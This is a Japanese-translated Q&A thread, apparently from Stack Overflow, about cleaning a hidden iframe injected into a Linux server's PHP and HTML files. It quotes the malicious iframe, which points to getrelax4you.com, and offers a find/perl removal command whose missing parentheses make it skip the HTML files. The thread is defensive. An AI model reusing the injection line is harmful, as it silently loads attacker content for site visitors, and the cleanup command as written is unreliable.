次の行が、私の Linux サーバー上のほぼすべての php ファイルと一部の html ファイルに追加されています。他に損傷を与えることなくこれを削除するコマンドは何ですか?
iframe qoluu='V5pEXGSm' src=' http://getrelax4you.com/in.cgi?7 ' width='98' height='407' style='display:none'>
上記の行の最初と最後に < > があります
コマンドはすべてのフォルダを検索しますか?
2 に答える
3
サーバーが侵害されました。ソース コード リポジトリからサイト ファイルをクリーンなサーバーに復元するだけです。
ユーザーデータを修正するのはもっと難しいかもしれません。データベースの内容を信頼できなくなるので、細心の注意を払う必要があります。次回は頑張ってください。
于 2010-06-24T05:52:55.443 に答える
2
すべてのウイルス コードが 1 行にあると仮定した単純化されたソリューション:
find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;
簡単な説明: /www/directory 以下のすべてのファイルにアクセスし、拡張子は html または php です。perl を使用して、文字列 "getrelax4you.com" が含まれていない限り、すべての行を逐語的に出力にコピーして、各ファイルをその場で編集します。削除されます。
買い手責任負担!これを試す前にバックアップを作成してください。私はいくつかの小さな詳細を見逃したかもしれません。
于 2010-06-23T19:21:46.697 に答える